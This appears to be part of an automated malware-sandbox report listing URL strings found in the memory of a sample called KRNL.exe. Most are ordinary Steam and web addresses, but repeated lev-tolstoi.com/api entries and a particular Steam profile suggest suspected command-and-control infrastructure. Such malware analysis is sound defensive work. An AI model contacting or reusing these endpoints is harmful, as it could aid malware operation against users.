Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampow
Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                    Source: KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                    Source: KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/6
                    Source: KRNL.exe, 00000002.00000003.1765217238.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751947129.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/?
                    Source: KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/GY
                    Source: KRNL.exe, 00000002.00000003.1821721499.00000000033EA000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1749014529.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751935463.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1749121760.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976367913.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1749066035.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976693796.000000000338B000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.0000000003366000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915873605.000000000338C000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api1
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiS
                    Source: KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apim
                    Source: KRNL.exe, 00000002.00000003.1751845531.00000000033EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiul
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/k
                    Source: KRNL.exe, 00000002.00000003.1699633987.0000000003342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/m/S
                    Source: KRNL.exe, 00000002.00000003.1699633987.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi#
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampK
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                    Source: KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.ah
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                    Source: KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaizedk
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                    Source: KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                    Source: KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                    Source: KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
